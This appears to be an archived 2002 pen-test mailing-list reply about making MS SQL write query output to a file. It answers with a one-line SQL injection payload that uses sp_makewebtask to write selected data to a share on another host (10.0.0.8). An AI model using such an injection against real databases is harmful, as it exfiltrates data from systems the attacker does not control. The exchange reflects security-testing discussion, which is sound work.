RE: Send output to file in SQL
From: Henry Dixon (henryd@fidesic.com)Date: 03/15/02
- Previous message: Lee Brotherston: "Re: Online commonly used password database"
- Maybe in reply to: Alex Harasic: "Send output to file in SQL"
- Next in thread: Jonah Kowall: "RE: Send output to file in SQL"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 15 Mar 2002 10:31:24 -0800 From: "Henry Dixon" <henryd@fidesic.com> To: "Alex Harasic" <aharasic@terra.cl>, <pen-test@securityfocus.com>
Try using the sp_makewebtask sproc.
';EXEC sp_makewebtask '\\10.0.0.8\public\hack.htmk', 'SELECT inputname FROM...' etc.
HTH
-h
-----Original Message-----
From: Alex Harasic [mailto:aharasic@terra.cl]
Sent: Wednesday, March 13, 2002 9:05 AM
To: pen-test@securityfocus.com
Subject: Send output to file in SQL
Hi, I've been looking around for ways to send output
to a file in a sql query. I know there is one for mySQL
but not for msSQL.
Anyone knows a way to send the output in a query
without using extended procedures?
Alex S. Harasic
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
- Previous message: Lee Brotherston: "Re: Online commonly used password database"
- Maybe in reply to: Alex Harasic: "Send output to file in SQL"
- Next in thread: Jonah Kowall: "RE: Send output to file in SQL"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|